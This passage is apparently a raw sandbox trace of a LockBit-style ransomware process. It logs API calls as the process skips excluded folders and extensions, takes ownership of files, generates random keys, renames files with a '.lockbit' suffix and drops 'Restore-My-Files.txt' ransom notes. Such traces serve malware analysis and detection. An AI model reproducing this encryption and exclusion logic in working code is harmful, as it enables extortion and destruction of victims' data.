lpString2="shadowonlyframe_videoinset.png") returned -1 [0087.350] lstrcmpiW (lpString1="autorun.inf", lpString2="shadowonlyframe_videoinset.png") returned -1 [0087.350] lstrcmpiW (lpString1="thumbs.db", lpString2="shadowonlyframe_videoinset.png") returned 1 [0087.350] lstrcmpiW (lpString1="iconcache.db", lpString2="shadowonlyframe_videoinset.png") returned -1 [0087.350] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\") returned="" [0087.350] PathFindExtensionW (pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\shadowonlyframe_videoinset.png") returned=".png" [0087.350] lstrcmpiW (lpString1=".rar", lpString2=".png") returned 1 [0087.350] lstrcmpiW (lpString1=".zip", lpString2=".png") returned 1 [0087.350] lstrcmpiW (lpString1=".7z", lpString2=".png") returned -1 [0087.350] lstrcmpiW (lpString1=".ckp", lpString2=".png") returned -1 [0087.362] lstrcmpiW (lpString1=".dacpac", lpString2=".png") returned -1 [0087.362] lstrcmpiW (lpString1=".db", lpString2=".png") returned -1 [0087.362] lstrcmpiW (lpString1=".db-shm", lpString2=".png") returned -1 [0087.362] lstrcmpiW (lpString1=".db-wal", lpString2=".png") returned -1 [0087.362] lstrcmpiW (lpString1=".db3", lpString2=".png") returned -1 [0087.362] lstrcmpiW (lpString1=".dbf", lpString2=".png") returned -1 [0087.362] lstrcmpiW (lpString1=".dbc", lpString2=".png") returned -1 [0087.362] lstrcmpiW (lpString1=".dbs", lpString2=".png") returned -1 [0087.362] lstrcmpiW (lpString1=".dbt", lpString2=".png") returned -1 [0087.362] lstrcmpiW (lpString1=".dbv", lpString2=".png") returned -1 [0087.362] lstrcmpiW (lpString1=".frm", lpString2=".png") returned -1 [0087.363] lstrcmpiW (lpString1=".mdf", lpString2=".png") returned -1 [0087.363] lstrcmpiW (lpString1=".mrg", lpString2=".png") returned -1 [0087.363] lstrcmpiW (lpString1=".mwb", lpString2=".png") returned -1 [0087.363] lstrcmpiW (lpString1=".myd", lpString2=".png") returned -1 [0087.363] lstrcmpiW (lpString1=".ndf", lpString2=".png") returned -1 [0087.363] lstrcmpiW (lpString1=".qry", lpString2=".png") returned 1 [0087.363] lstrcmpiW (lpString1=".sdb", lpString2=".png") returned 1 [0087.363] lstrcmpiW (lpString1=".sdf", lpString2=".png") returned 1 [0087.363] lstrcmpiW (lpString1=".sql", lpString2=".png") returned 1 [0087.363] lstrcmpiW (lpString1=".sqlite", lpString2=".png") returned 1 [0087.363] lstrcmpiW (lpString1=".sqlite3", lpString2=".png") returned 1 [0087.363] lstrcmpiW (lpString1=".sqlitedb", lpString2=".png") returned 1 [0087.363] lstrcmpiW (lpString1=".tmd", lpString2=".png") returned 1 [0087.363] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\shadowonlyframe_videoinset.png.lockbit") returned 83 [0087.363] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\shadowonlyframe_videoinset.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\shadowonlyframe_videoinset.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0087.364] GetProcAddress (hModule=0x77c40000, lpProcName="RtlFreeUnicodeString") returned 0x77c6e126 [0087.364] GetProcAddress (hModule=0x77c40000, lpProcName="RtlDosPathNameToNtPathName_U_WithStatus") returned 0x77c81660 [0087.364] RtlDosPathNameToNtPathName_U_WithStatus () returned 0x0 [0087.364] GetProcAddress (hModule=0x77c40000, lpProcName="NtOpenFile") returned 0x77c5fd54 [0087.364] GetProcAddress (hModule=0x77c40000, lpProcName="CloseHandle") returned 0x0 [0087.364] RtlFreeAnsiString (AnsiString="\\") [0087.364] NtOpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x3d6b908 | out: TokenHandle=0x3d6b908*=0x3c4) returned 0x0 [0087.365] malloc (_Size=0x200) returned 0x77d800 [0087.365] NtQueryInformationToken (in: TokenHandle=0x3c4, TokenInformationClass=0x1, TokenInformation=0x77d800, TokenInformationLength=0x200, ReturnLength=0x3d6b900 | out: TokenInformation=0x77d800, ReturnLength=0x3d6b900) returned 0x0 [0087.365] InitializeSecurityDescriptor (in: pSecurityDescriptor=0x3d6b6bc, dwRevision=0x1 | out: pSecurityDescriptor=0x3d6b6bc) returned 1 [0087.365] SetSecurityDescriptorOwner (in: pSecurityDescriptor=0x3d6b6bc, pOwner=0x77d808*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), bOwnerDefaulted=0 | out: pSecurityDescriptor=0x3d6b6bc) returned 1 [0087.365] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\shadowonlyframe_videoinset.png", SecurityInformation=0x1, pSecurityDescriptor=0x3d6b6bc) returned 1 [0087.365] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\shadowonlyframe_videoinset.png", SecurityInformation=0x4, pSecurityDescriptor=0x3d6b6bc) returned 1 [0087.366] CloseHandle (hObject=0x3c4) returned 1 [0087.366] free (_Block=0x77d800) [0087.366] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\shadowonlyframe_videoinset.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\shadowonlyframe_videoinset.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3c4 [0087.366] CreateIoCompletionPort (FileHandle=0x3c4, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0087.366] malloc (_Size=0x40068) returned 0x3e30078 [0087.367] GetFileSizeEx (in: hFile=0x3c4, lpFileSize=0x3e30090 | out: lpFileSize=0x3e30090*=3214) returned 1 [0087.367] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0087.368] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0087.368] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e700ac, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e700ac) returned 0x0 [0087.368] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0087.368] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0087.368] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e700bc, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e700bc) returned 0x0 [0087.369] ReadFile (in: hFile=0x3c4, lpBuffer=0x3e300ac, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e30078 | out: lpBuffer=0x3e300ac*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e30078) returned 1 [0087.380] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\shadowonlyframe_videoinset.png.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\shadowonlyframe_videoinset.png.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0087.380] malloc (_Size=0xbc) returned 0x77d800 [0087.380] NtSetInformationFile (FileHandle=0x3c4, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d800, Length=0xbc, FileInformationClass=0xa) returned 0x0 [0087.381] free (_Block=0x77d800) [0087.381] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\shadowonlyframe_videoinset.png" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles") returned 1 [0087.381] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Restore-My-Files.txt") returned 65 [0087.381] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Restore-My-Files.txt" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0087.381] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9f4d7984, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0xaa9057bb, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x9f4fdbf3, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x520150, dwReserved1=0x0, cFileName="Shatter", cAlternateFileName="")) returned 1 [0087.381] lstrcmpiW (lpString1=".", lpString2="Shatter") returned -1 [0087.381] lstrcmpiW (lpString1="..", lpString2="Shatter") returned -1 [0087.381] lstrcmpiW (lpString1="Shatter", lpString2="$windows.~bt") returned 1 [0087.381] lstrcmpiW (lpString1="Shatter", lpString2="intel") returned 1 [0087.381] lstrcmpiW (lpString1="Shatter", lpString2="msocache") returned 1 [0087.381] lstrcmpiW (lpString1="Shatter", lpString2="$recycle.bin") returned 1 [0087.381] lstrcmpiW (lpString1="Shatter", lpString2="$windows.~ws") returned 1 [0087.381] lstrcmpiW (lpString1="Shatter", lpString2="tor browser") returned -1 [0087.382] lstrcmpiW (lpString1="Shatter", lpString2="boot") returned 1 [0087.382] lstrcmpiW (lpString1="Shatter", lpString2="system volume information") returned -1 [0087.382] lstrcmpiW (lpString1="Shatter", lpString2="perflogs") returned 1 [0087.382] lstrcmpiW (lpString1="Shatter", lpString2="google") returned 1 [0087.382] lstrcmpiW (lpString1="Shatter", lpString2="application data") returned 1 [0087.382] lstrcmpiW (lpString1="Shatter", lpString2="windows") returned -1 [0087.382] lstrcmpiW (lpString1="Shatter", lpString2="windows.old") returned -1 [0087.382] lstrcmpiW (lpString1="Shatter", lpString2="appdata") returned 1 [0087.382] lstrcmpiW (lpString1="Shatter", lpString2="Windows nt") returned -1 [0087.382] lstrcmpiW (lpString1="Shatter", lpString2="Msbuild") returned 1 [0087.382] lstrcmpiW (lpString1="Shatter", lpString2="Microsoft") returned 1 [0087.382] lstrcmpiW (lpString1="Shatter", lpString2="All users") returned 1 [0087.382] lstrcmpiW (lpString1="Shatter", lpString2="mozilla") returned 1 [0087.382] lstrcmpiW (lpString1="Shatter", lpString2="Microsoft.NET") returned 1 [0087.382] lstrcmpiW (lpString1="Shatter", lpString2="microsoft shared") returned 1 [0087.382] lstrcmpiW (lpString1="Shatter", lpString2="Internet Explorer") returned 1 [0087.382] lstrcmpiW (lpString1="Shatter", lpString2="common files") returned 1 [0087.382] lstrcmpiW (lpString1="Shatter", lpString2="opera") returned 1 [0087.382] lstrcmpiW (lpString1="Shatter", lpString2="Windows Journal") returned -1 [0087.382] wsprintfW (in: param_1=0x3d6b928, param_2="%s\\%s" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Shatter") returned 52 [0087.382] wsprintfW (in: param_1=0x3d6ad00, param_2="%s\\*" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Shatter\\*") returned 54 [0087.382] FindFirstFileExW (in: lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Shatter\\*", fInfoLevelId=0x0, lpFindFileData=0x3d6b120, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x0 | out: lpFindFileData=0x3d6b120) returned 0x55fe78 [0087.395] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0087.395] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9f4d7984, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0xaa9057bb, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x9f4fdbf3, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0087.395] lstrcmpiW (lpString1=".", lpString2="..") returned -1 [0087.395] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0087.395] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6ff23274, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6ff23274, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4f204eff, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x11da, dwReserved0=0x0, dwReserved1=0x0, cFileName="1047x576black.png", cAlternateFileName="")) returned 1 [0087.395] lstrcmpiW (lpString1=".", lpString2="1047x576black.png") returned -1 [0087.395] lstrcmpiW (lpString1="..", lpString2="1047x576black.png") returned -1 [0087.395] PathFindExtensionW (pszPath="1047x576black.png") returned=".png" [0087.395] lstrcmpiW (lpString1=".386", lpString2=".png") returned -1 [0087.396] lstrcmpiW (lpString1=".cmd", lpString2=".png") returned -1 [0087.396] lstrcmpiW (lpString1=".exe", lpString2=".png") returned -1 [0087.396] lstrcmpiW (lpString1=".ani", lpString2=".png") returned -1 [0087.396] lstrcmpiW (lpString1=".adv", lpString2=".png") returned -1 [0087.396] lstrcmpiW (lpString1=".theme", lpString2=".png") returned 1 [0087.396] lstrcmpiW (lpString1=".msi", lpString2=".png") returned -1 [0087.396] lstrcmpiW (lpString1=".msp", lpString2=".png") returned -1 [0087.396] lstrcmpiW (lpString1=".com", lpString2=".png") returned -1 [0087.396] lstrcmpiW (lpString1=".diagpkg", lpString2=".png") returned -1 [0087.396] lstrcmpiW (lpString1=".nls", lpString2=".png") returned -1 [0087.396] lstrcmpiW (lpString1=".diagcab", lpString2=".png") returned -1 [0087.396] lstrcmpiW (lpString1=".lock", lpString2=".png") returned -1 [0087.396] lstrcmpiW (lpString1=".ocx", lpString2=".png") returned -1 [0087.396] lstrcmpiW (lpString1=".mpa", lpString2=".png") returned -1 [0087.396] lstrcmpiW (lpString1=".cpl", lpString2=".png") returned -1 [0087.396] lstrcmpiW (lpString1=".mod", lpString2=".png") returned -1 [0087.396] lstrcmpiW (lpString1=".hta", lpString2=".png") returned -1 [0087.396] lstrcmpiW (lpString1=".icns", lpString2=".png") returned -1 [0087.396] lstrcmpiW (lpString1=".prf", lpString2=".png") returned 1 [0087.396] lstrcmpiW (lpString1=".rtp", lpString2=".png") returned 1 [0087.396] lstrcmpiW (lpString1=".diagcfg", lpString2=".png") returned -1 [0087.396] lstrcmpiW (lpString1=".msstyles", lpString2=".png") returned -1 [0087.396] lstrcmpiW (lpString1=".bin", lpString2=".png") returned -1 [0087.396] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0087.397] lstrcmpiW (lpString1=".shs", lpString2=".png") returned 1 [0087.397] lstrcmpiW (lpString1=".drv", lpString2=".png") returned -1 [0087.397] lstrcmpiW (lpString1=".wpx", lpString2=".png") returned 1 [0087.397] lstrcmpiW (lpString1=".bat", lpString2=".png") returned -1 [0087.397] lstrcmpiW (lpString1=".rom", lpString2=".png") returned 1 [0087.397] lstrcmpiW (lpString1=".msc", lpString2=".png") returned -1 [0087.397] lstrcmpiW (lpString1=".spl", lpString2=".png") returned 1 [0087.397] lstrcmpiW (lpString1=".ps1", lpString2=".png") returned 1 [0087.397] lstrcmpiW (lpString1=".msu", lpString2=".png") returned -1 [0087.397] lstrcmpiW (lpString1=".ics", lpString2=".png") returned -1 [0087.397] lstrcmpiW (lpString1=".key", lpString2=".png") returned -1 [0087.397] lstrcmpiW (lpString1=".mp3", lpString2=".png") returned -1 [0087.397] lstrcmpiW (lpString1=".reg", lpString2=".png") returned 1 [0087.397] lstrcmpiW (lpString1=".dll", lpString2=".png") returned -1 [0087.397] lstrcmpiW (lpString1=".ini", lpString2=".png") returned -1 [0087.397] lstrcmpiW (lpString1=".idx", lpString2=".png") returned -1 [0087.397] lstrcmpiW (lpString1=".sys", lpString2=".png") returned 1 [0087.397] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0087.397] lstrcmpiW (lpString1=".ico", lpString2=".png") returned -1 [0087.397] lstrcmpiW (lpString1=".lnk", lpString2=".png") returned -1 [0087.397] lstrcmpiW (lpString1=".rdp", lpString2=".png") returned 1 [0087.397] lstrcmpiW (lpString1=".lockbit", lpString2=".png") returned -1 [0087.397] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="1047x576black.png") returned 1 [0087.397] lstrcmpiW (lpString1="ntldr", lpString2="1047x576black.png") returned 1 [0087.398] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="1047x576black.png") returned 1 [0087.398] lstrcmpiW (lpString1="bootsect.bak", lpString2="1047x576black.png") returned 1 [0087.398] lstrcmpiW (lpString1="autorun.inf", lpString2="1047x576black.png") returned 1 [0087.398] lstrcmpiW (lpString1="thumbs.db", lpString2="1047x576black.png") returned 1 [0087.398] lstrcmpiW (lpString1="iconcache.db", lpString2="1047x576black.png") returned 1 [0087.398] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Shatter" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Shatter\\") returned="" [0087.398] PathFindExtensionW (pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Shatter\\1047x576black.png") returned=".png" [0087.398] lstrcmpiW (lpString1=".rar", lpString2=".png") returned 1 [0087.398] lstrcmpiW (lpString1=".zip", lpString2=".png") returned 1 [0087.398] lstrcmpiW (lpString1=".7z", lpString2=".png") returned -1 [0087.398] lstrcmpiW (lpString1=".ckp", lpString2=".png") returned -1 [0087.398] lstrcmpiW (lpString1=".dacpac", lpString2=".png") returned -1 [0087.398] lstrcmpiW (lpString1=".db", lpString2=".png") returned -1 [0087.398] lstrcmpiW (lpString1=".db-shm", lpString2=".png") returned -1 [0087.398] lstrcmpiW (lpString1=".db-wal", lpString2=".png") returned -1 [0087.398] lstrcmpiW (lpString1=".db3", lpString2=".png") returned -1 [0087.398] lstrcmpiW (lpString1=".dbf", lpString2=".png") returned -1 [0087.398] lstrcmpiW (lpString1=".dbc", lpString2=".png") returned -1 [0087.398] lstrcmpiW (lpString1=".dbs", lpString2=".png") returned -1 [0087.398] lstrcmpiW (lpString1=".dbt", lpString2=".png") returned -1 [0087.398] lstrcmpiW (lpString1=".dbv", lpString2=".png") returned -1 [0087.398] lstrcmpiW (lpString1=".frm", lpString2=".png") returned -1 [0087.398] lstrcmpiW (lpString1=".mdf", lpString2=".png") returned -1 [0087.399] lstrcmpiW (lpString1=".mrg", lpString2=".png") returned -1 [0087.399] lstrcmpiW (lpString1=".mwb", lpString2=".png") returned -1 [0087.399] lstrcmpiW (lpString1=".myd", lpString2=".png") returned -1 [0087.399] lstrcmpiW (lpString1=".ndf", lpString2=".png") returned -1 [0087.399] lstrcmpiW (lpString1=".qry", lpString2=".png") returned 1 [0087.399] lstrcmpiW (lpString1=".sdb", lpString2=".png") returned 1 [0087.399] lstrcmpiW (lpString1=".sdf", lpString2=".png") returned 1 [0087.399] lstrcmpiW (lpString1=".sql", lpString2=".png") returned 1 [0087.399] lstrcmpiW (lpString1=".sqlite", lpString2=".png") returned 1 [0087.399] lstrcmpiW (lpString1=".sqlite3", lpString2=".png") returned 1 [0087.399] lstrcmpiW (lpString1=".sqlitedb", lpString2=".png") returned 1 [0087.399] lstrcmpiW (lpString1=".tmd", lpString2=".png") returned 1 [0087.399] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Shatter\\1047x576black.png.lockbit") returned 78 [0087.399] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Shatter\\1047x576black.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\shatter\\1047x576black.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0087.400] GetProcAddress (hModule=0x77c40000, lpProcName="RtlFreeUnicodeString") returned 0x77c6e126 [0087.400] GetProcAddress (hModule=0x77c40000, lpProcName="RtlDosPathNameToNtPathName_U_WithStatus") returned 0x77c81660 [0087.400] RtlDosPathNameToNtPathName_U_WithStatus () returned 0x0 [0087.400] GetProcAddress (hModule=0x77c40000, lpProcName="NtOpenFile") returned 0x77c5fd54 [0087.400] GetProcAddress (hModule=0x77c40000, lpProcName="CloseHandle") returned 0x0 [0087.401] RtlFreeAnsiString (AnsiString="\\") [0087.401] NtOpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x3d6ace0 | out: TokenHandle=0x3d6ace0*=0x3a0) returned 0x0 [0087.401] malloc (_Size=0x200) returned 0x77d800 [0087.401] NtQueryInformationToken (in: TokenHandle=0x3a0, TokenInformationClass=0x1, TokenInformation=0x77d800, TokenInformationLength=0x200, ReturnLength=0x3d6acd8 | out: TokenInformation=0x77d800, ReturnLength=0x3d6acd8) returned 0x0 [0087.401] InitializeSecurityDescriptor (in: pSecurityDescriptor=0x3d6aa94, dwRevision=0x1 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0087.401] SetSecurityDescriptorOwner (in: pSecurityDescriptor=0x3d6aa94, pOwner=0x77d808*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), bOwnerDefaulted=0 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0087.401] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Shatter\\1047x576black.png", SecurityInformation=0x1, pSecurityDescriptor=0x3d6aa94) returned 1 [0087.401] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Shatter\\1047x576black.png", SecurityInformation=0x4, pSecurityDescriptor=0x3d6aa94) returned 1 [0087.402] CloseHandle (hObject=0x3a0) returned 1 [0087.402] free (_Block=0x77d800) [0087.402] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Shatter\\1047x576black.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\shatter\\1047x576black.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3a0 [0087.402] CreateIoCompletionPort (FileHandle=0x3a0, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0087.402] malloc (_Size=0x40068) returned 0x3d70048 [0087.402] GetFileSizeEx (in: hFile=0x3a0, lpFileSize=0x3d70060 | out: lpFileSize=0x3d70060*=4570) returned 1 [0087.402] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0087.403] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0087.403] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db007c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db007c) returned 0x0 [0087.403] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0087.403] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0087.403] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db008c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db008c) returned 0x0 [0087.403] ReadFile (in: hFile=0x3a0, lpBuffer=0x3d7007c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70048 | out: lpBuffer=0x3d7007c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70048) returned 0x0 [0087.414] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Shatter\\1047x576black.png.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Shatter\\1047x576black.png.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0087.414] malloc (_Size=0xb2) returned 0x77d800 [0087.414] NtSetInformationFile (FileHandle=0x3a0, IoStatusBlock=0x3d6aa8c, FileInformation=0x77d800, Length=0xb2, FileInformationClass=0xa) returned 0x0 [0087.415] free (_Block=0x77d800) [0087.415] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Shatter\\1047x576black.png" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Shatter") returned 1 [0087.415] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Shatter\\Restore-My-Files.txt") returned 73 [0087.415] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Shatter\\Restore-My-Files.txt" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\shatter\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3b8 [0087.416] CreateIoCompletionPort (FileHandle=0x3b8, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0087.416] malloc (_Size=0x40068) returned 0x1fb18c0 [0087.416] WriteFile (in: hFile=0x3b8, lpBuffer=0x1fa30f8, nNumberOfBytesToWrite=0x472, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fa30f8, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0) returned 0x0 [0087.418] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6ff493d1, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6ff493d1, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4f29d477, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xb04, dwReserved0=0x0, dwReserved1=0x0, cFileName="203x8subpicture.png", cAlternateFileName="")) returned 1 [0087.418] lstrcmpiW (lpString1=".", lpString2="203x8subpicture.png") returned -1 [0087.418] lstrcmpiW (lpString1="..", lpString2="203x8subpicture.png") returned -1 [0087.418] PathFindExtensionW (pszPath="203x8subpicture.png") returned=".png" [0087.418] lstrcmpiW (lpString1=".386", lpString2=".png") returned -1 [0087.418] lstrcmpiW (lpString1=".cmd", lpString2=".png") returned -1 [0087.418] lstrcmpiW (lpString1=".exe", lpString2=".png") returned -1 [0087.418] lstrcmpiW (lpString1=".ani", lpString2=".png") returned -1 [0087.418] lstrcmpiW (lpString1=".adv", lpString2=".png") returned -1 [0087.418] lstrcmpiW (lpString1=".theme", lpString2=".png") returned 1 [0087.418] lstrcmpiW (lpString1=".msi", lpString2=".png") returned -1 [0087.418] lstrcmpiW (lpString1=".msp", lpString2=".png") returned -1 [0087.418] lstrcmpiW (lpString1=".com", lpString2=".png") returned -1 [0087.418] lstrcmpiW (lpString1=".diagpkg", lpString2=".png") returned -1 [0087.418] lstrcmpiW (lpString1=".nls", lpString2=".png") returned -1 [0087.419] lstrcmpiW (lpString1=".diagcab", lpString2=".png") returned -1 [0087.419] lstrcmpiW (lpString1=".lock", lpString2=".png") returned -1 [0087.419] lstrcmpiW (lpString1=".ocx", lpString2=".png") returned -1 [0087.419] lstrcmpiW (lpString1=".mpa", lpString2=".png") returned -1 [0087.419] lstrcmpiW (lpString1=".cpl", lpString2=".png") returned -1 [0087.419] lstrcmpiW (lpString1=".mod", lpString2=".png") returned -1 [0087.419] lstrcmpiW (lpString1=".hta", lpString2=".png") returned -1 [0087.419] lstrcmpiW (lpString1=".icns", lpString2=".png") returned -1 